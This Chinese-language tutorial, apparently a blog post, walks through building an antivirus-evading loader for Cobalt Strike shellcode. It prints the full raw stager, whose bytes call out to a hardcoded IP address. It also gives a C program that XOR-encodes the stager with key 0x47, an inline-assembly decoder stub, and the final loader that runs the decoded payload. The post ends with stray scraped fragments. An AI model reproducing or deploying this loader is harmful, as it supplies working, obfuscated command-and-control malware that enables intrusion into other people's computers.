首先cobaltstrike生成一个原生c,我的是:
/* length: 797 bytes */
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c"
"\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
"\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01"
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68"
"\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00"
"\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6"
"\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d"
"\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0"
"\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00"
"\x00\xe8\x8b\xff\xff\xff\x2f\x71\x41\x52\x58\x00\xb5\x37\x71\xcd\x36\x1c\x5b\x6d\xa8\x2c\x36"
"\xd0\xfa\x3d\x5b\xe2\x82\xa5\x4f\xbe\x67\xf0\x92\x6c\xec\x22\x6f\xa0\x68\x22\x94\x31\xb9\x81"
"\xf5\xfe\x68\x06\x04\x1a\xbc\xcf\xa5\xdc\xfd\xa0\x49\x31\xa4\x74\x12\xb4\x15\x76\x48\xf2\x81"
"\x6a\xfb\x01\x82\x94\x61\x1e\x40\x85\x2d\x31\x06\x2d\x62\x22\xfa\x00\x55\x73\x65\x72\x2d\x41"
"\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70"
"\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b"
"\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x31\x2e\x31\x2e\x34\x33\x32\x32\x3b\x20\x42\x4f\x49"
"\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x97\xd8\x20\x60\x52\xa4\x8b\xc5\x6b\xbc\xb7\xfc"
"\xa8\xd8\x88\x4c\xf9\xa7\x49\x83\x03\x49\x1b\x4d\x3b\xfa\x0d\x33\xf2\x44\xfc\x58\x69\x9f\xbb"
"\xe1\xbb\xe4\x30\x00\xd5\x64\x33\xea\x9b\x04\x7d\xc4\x36\xde\xcb\x60\xdb\xf2\x7c\x85\xa5\xfe"
"\xfc\xaa\x17\x66\xc5\x6d\xaa\xda\x01\xec\x03\xad\xa1\x26\xe0\x12\xfb\xe1\x55\xa6\x38\xd8\xf9"
"\x61\x0b\x27\x58\xca\xae\xc5\xf1\x07\x6b\xcb\xd6\x46\x5a\xe4\x50\x14\x1b\x38\xe0\xda\x62\x8c"
"\x6e\xb8\xa7\x13\x87\x89\x02\x8e\x08\xb4\xd8\x52\xdc\x3e\x67\xde\xf5\x70\xb5\xee\x81\x96\x42"
"\x82\x2b\x96\xbb\x35\x30\x6d\x01\x59\xec\x98\xe6\x76\x21\x13\xe7\x4d\x8f\x4f\xb3\xf1\x89\x53"
"\xd3\xc4\xa6\xa3\xdf\x99\xf9\x80\x65\x8d\x5d\x30\x9d\xf7\x1a\x32\xd6\xfb\xb8\xf6\x59\x46\x26"
"\xe1\x2c\xc8\xa8\xe8\x4b\x7c\x3d\x97\x59\x50\xd7\x93\x11\xe1\xd3\xcf\x9f\x08\x22\x9b\x00\x68"
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56"
"\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9"
"\xfd\xff\xff\x34\x37\x2e\x39\x34\x2e\x32\x34\x32\x2e\x31\x36\x00\x6f\xaa\x51\xc3";找一个key进行异或,我找的是0x47,怎么找shellcode里没有的呢?将我们的shellcode复制到一个文本编辑器里,然后利用查询,从01开始一直搜,直到找到我们想要的。
对我们的shellcode进行编码,由于shellcode内容过多,我编码后存放到一个文件里了,编码程序:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"char key=0x47;/* length: 797 bytes */
unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c"
"\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
"\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01"
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68"
"\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00"
"\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6"
"\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d"
"\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0"
"\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00"
"\x00\xe8\x8b\xff\xff\xff\x2f\x71\x41\x52\x58\x00\xb5\x37\x71\xcd\x36\x1c\x5b\x6d\xa8\x2c\x36"
"\xd0\xfa\x3d\x5b\xe2\x82\xa5\x4f\xbe\x67\xf0\x92\x6c\xec\x22\x6f\xa0\x68\x22\x94\x31\xb9\x81"
"\xf5\xfe\x68\x06\x04\x1a\xbc\xcf\xa5\xdc\xfd\xa0\x49\x31\xa4\x74\x12\xb4\x15\x76\x48\xf2\x81"
"\x6a\xfb\x01\x82\x94\x61\x1e\x40\x85\x2d\x31\x06\x2d\x62\x22\xfa\x00\x55\x73\x65\x72\x2d\x41"
"\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70"
"\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b"
"\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x31\x2e\x31\x2e\x34\x33\x32\x32\x3b\x20\x42\x4f\x49"
"\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x97\xd8\x20\x60\x52\xa4\x8b\xc5\x6b\xbc\xb7\xfc"
"\xa8\xd8\x88\x4c\xf9\xa7\x49\x83\x03\x49\x1b\x4d\x3b\xfa\x0d\x33\xf2\x44\xfc\x58\x69\x9f\xbb"
"\xe1\xbb\xe4\x30\x00\xd5\x64\x33\xea\x9b\x04\x7d\xc4\x36\xde\xcb\x60\xdb\xf2\x7c\x85\xa5\xfe"
"\xfc\xaa\x17\x66\xc5\x6d\xaa\xda\x01\xec\x03\xad\xa1\x26\xe0\x12\xfb\xe1\x55\xa6\x38\xd8\xf9"
"\x61\x0b\x27\x58\xca\xae\xc5\xf1\x07\x6b\xcb\xd6\x46\x5a\xe4\x50\x14\x1b\x38\xe0\xda\x62\x8c"
"\x6e\xb8\xa7\x13\x87\x89\x02\x8e\x08\xb4\xd8\x52\xdc\x3e\x67\xde\xf5\x70\xb5\xee\x81\x96\x42"
"\x82\x2b\x96\xbb\x35\x30\x6d\x01\x59\xec\x98\xe6\x76\x21\x13\xe7\x4d\x8f\x4f\xb3\xf1\x89\x53"
"\xd3\xc4\xa6\xa3\xdf\x99\xf9\x80\x65\x8d\x5d\x30\x9d\xf7\x1a\x32\xd6\xfb\xb8\xf6\x59\x46\x26"
"\xe1\x2c\xc8\xa8\xe8\x4b\x7c\x3d\x97\x59\x50\xd7\x93\x11\xe1\xd3\xcf\x9f\x08\x22\x9b\x00\x68"
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56"
"\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9"
"\xfd\xff\xff\x34\x37\x2e\x39\x34\x2e\x32\x34\x32\x2e\x31\x36\x00\x6f\xaa\x51\xc3";void main()
{int i = 0, len = 797; FILE * fp;//len=sizeof(shellcode)/sizeof(shellcode[0]);unsigned char * output = (unsigned char *)malloc(len + 4); for (i = 0; i<len; i++)output[i] = shellcode[i] ^ key; fp = fopen("./encode.txt", "w+"); fprintf(fp, "\"");for (i = 0; i<len; i++){fprintf(fp, "\\x%0.2x", output[i]);if ((i + 1) % 16 == 0)fprintf(fp, "\"\n\"");}fprintf(fp, "\"");fclose(fp);printf("dump the encoded shellcode to encode.txt OK!\n");free(output);}
运行我们的程序,成功得到加密的shellcode
解密程序:
__asm{add eax,24mov ecx,797xor edx,edx
decode:mov bl,byte ptr ds:[eax+edx]xor bl,47hmov byte ptr ds:[eax+edx],blinc edxloop decode}797是我们加密后的shellcode长度,也就是encode数组长度,24是这段机器码长度,47h是key,来异或的
反汇编,找出这段程序的机器码,
把这段机器码放在加密后的shellcode前面
最终程序:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"char key=0x47;unsigned char encode[]="\x83\xC0\x18\xB9\x1d\x03\x00\x00\x33\xD2\x3E\x8A\x1C\x10\x80\xF3\x47\x3E\x88\x1C\x10\x42\xE2\xF2"
"\xbb\xaf\xce\x47\x47\x47\x27\xce\xa2\x76\x95\x23\xcc\x15\x77\xcc"
"\x15\x4b\xcc\x15\x53\xcc\x35\x6f\x48\xf0\x0d\x61\x76\xb8\x76\x87"
"\xeb\x7b\x26\x3b\x45\x6b\x67\x86\x88\x4a\x46\x80\xa5\xb7\x15\x10"
"\xcc\x15\x57\xcc\x05\x7b\x46\x97\xcc\x07\x3f\xc2\x87\x33\x0d\x46"
"\x97\x17\xcc\x0f\x5f\xcc\x1f\x67\x46\x94\xa4\x7b\x0e\xcc\x73\xcc"
"\x46\x91\x76\xb8\x76\x87\xeb\x86\x88\x4a\x46\x80\x7f\xa7\x32\xb3"
"\x44\x3a\xbf\x7c\x3a\x63\x32\xa5\x1f\xcc\x1f\x63\x46\x94\x21\xcc"
"\x4b\x0c\xcc\x1f\x5b\x46\x94\xcc\x43\xcc\x46\x97\xce\x03\x63\x63"
"\x1c\x1c\x26\x1e\x1d\x16\xb8\xa7\x1f\x18\x1d\xcc\x55\xac\xc1\x1a"
"\x2f\x29\x22\x33\x47\x2f\x30\x2e\x29\x2e\x13\x2f\x0b\x30\x61\x40"
"\xb8\x92\x76\xb8\x10\x10\x10\x10\x10\x2f\x7d\x11\x3e\xe0\xb8\x92"
"\xae\xc3\x47\x47\x47\x1c\x76\x8e\x16\x16\x2d\x44\x16\x16\x2f\xfc"
"\x46\x47\x47\x14\x17\x2f\x10\xce\xd8\x81\xb8\x92\xac\x37\x1c\x76"
"\x95\x15\x2f\x47\x45\x07\xc3\x15\x15\x15\x14\x15\x17\x2f\xac\x12"
"\x69\x7c\xb8\x92\xce\x81\xc4\x84\x17\x76\xb8\x10\x10\x2d\xb8\x14"
"\x11\x2f\x6a\x41\x5f\x3c\xb8\x92\xc2\x87\x48\xc3\x84\x46\x47\x47"
"\x76\xb8\xc2\xb1\x33\x43\xce\xbe\xac\x4e\x2f\xed\x82\xa5\x1a\xb8"
"\x92\xce\x86\x2f\x02\x66\x19\x76\xb8\x92\x76\xb8\x10\x2d\x40\x16"
"\x11\x17\x2f\xf0\x10\xa7\x4c\xb8\x92\xf8\x47\x68\x47\x47\x7e\x80"
"\x33\xf0\x76\xb8\xae\xd6\x46\x47\x47\xae\x8e\x46\x47\x47\xaf\xcc"
"\xb8\xb8\xb8\x68\x36\x06\x15\x1f\x47\xf2\x70\x36\x8a\x71\x5b\x1c"
"\x2a\xef\x6b\x71\x97\xbd\x7a\x1c\xa5\xc5\xe2\x08\xf9\x20\xb7\xd5"
"\x2b\xab\x65\x28\xe7\x2f\x65\xd3\x76\xfe\xc6\xb2\xb9\x2f\x41\x43"
"\x5d\xfb\x88\xe2\x9b\xba\xe7\x0e\x76\xe3\x33\x55\xf3\x52\x31\x0f"
"\xb5\xc6\x2d\xbc\x46\xc5\xd3\x26\x59\x07\xc2\x6a\x76\x41\x6a\x25"
"\x65\xbd\x47\x12\x34\x22\x35\x6a\x06\x20\x22\x29\x33\x7d\x67\x0a"
"\x28\x3d\x2e\x2b\x2b\x26\x68\x73\x69\x77\x67\x6f\x24\x28\x2a\x37"
"\x26\x33\x2e\x25\x2b\x22\x7c\x67\x0a\x14\x0e\x02\x67\x7f\x69\x77"
"\x7c\x67\x10\x2e\x29\x23\x28\x30\x34\x67\x09\x13\x67\x72\x69\x76"
"\x7c\x67\x13\x35\x2e\x23\x22\x29\x33\x68\x73\x69\x77\x7c\x67\x69"
"\x09\x02\x13\x67\x04\x0b\x15\x67\x76\x69\x76\x69\x73\x74\x75\x75"
"\x7c\x67\x05\x08\x0e\x02\x7f\x7c\x02\x09\x12\x14\x6e\x4a\x4d\x47"
"\xd0\x9f\x67\x27\x15\xe3\xcc\x82\x2c\xfb\xf0\xbb\xef\x9f\xcf\x0b"
"\xbe\xe0\x0e\xc4\x44\x0e\x5c\x0a\x7c\xbd\x4a\x74\xb5\x03\xbb\x1f"
"\x2e\xd8\xfc\xa6\xfc\xa3\x77\x47\x92\x23\x74\xad\xdc\x43\x3a\x83"
"\x71\x99\x8c\x27\x9c\xb5\x3b\xc2\xe2\xb9\xbb\xed\x50\x21\x82\x2a"
"\xed\x9d\x46\xab\x44\xea\xe6\x61\xa7\x55\xbc\xa6\x12\xe1\x7f\x9f"
"\xbe\x26\x4c\x60\x1f\x8d\xe9\x82\xb6\x40\x2c\x8c\x91\x01\x1d\xa3"
"\x17\x53\x5c\x7f\xa7\x9d\x25\xcb\x29\xff\xe0\x54\xc0\xce\x45\xc9"
"\x4f\xf3\x9f\x15\x9b\x79\x20\x99\xb2\x37\xf2\xa9\xc6\xd1\x05\xc5"
"\x6c\xd1\xfc\x72\x77\x2a\x46\x1e\xab\xdf\xa1\x31\x66\x54\xa0\x0a"
"\xc8\x08\xf4\xb6\xce\x14\x94\x83\xe1\xe4\x98\xde\xbe\xc7\x22\xca"
"\x1a\x77\xda\xb0\x5d\x75\x91\xbc\xff\xb1\x1e\x01\x61\xa6\x6b\x8f"
"\xef\xaf\x0c\x3b\x7a\xd0\x1e\x17\x90\xd4\x56\xa6\x94\x88\xd8\x4f"
"\x65\xdc\x47\x2f\xb7\xf2\xe5\x11\xb8\x92\x2d\x07\x2f\x47\x57\x47"
"\x47\x2f\x47\x47\x07\x47\x10\x2f\x1f\xe3\x14\xa2\xb8\x92\xd4\xfe"
"\x47\x47\x47\x47\x46\x9e\x16\x14\xce\xa0\x10\x2f\x47\x67\x47\x47"
"\x14\x11\x2f\x55\xd1\xce\xa5\xb8\x92\xc2\x87\x33\x81\xcc\x40\x46"
"\x84\xc2\x87\x32\xa2\x1f\x84\xaf\xee\xba\xb8\xb8\x73\x70\x69\x7e"
"\x73\x69\x75\x73\x75\x69\x76\x71\x47\x28\xed\x16\x84";void main()
{__asm{lea eax,encodepush eaxret }
}运行前把火绒、360等安全软件关了,运行,成功抓到
方法与示例)
)
)
》...)
![[我研究]Behavior Based Software Theft Detection - Hawk](http://pic.xiahunao.cn/[我研究]Behavior Based Software Theft Detection - Hawk)
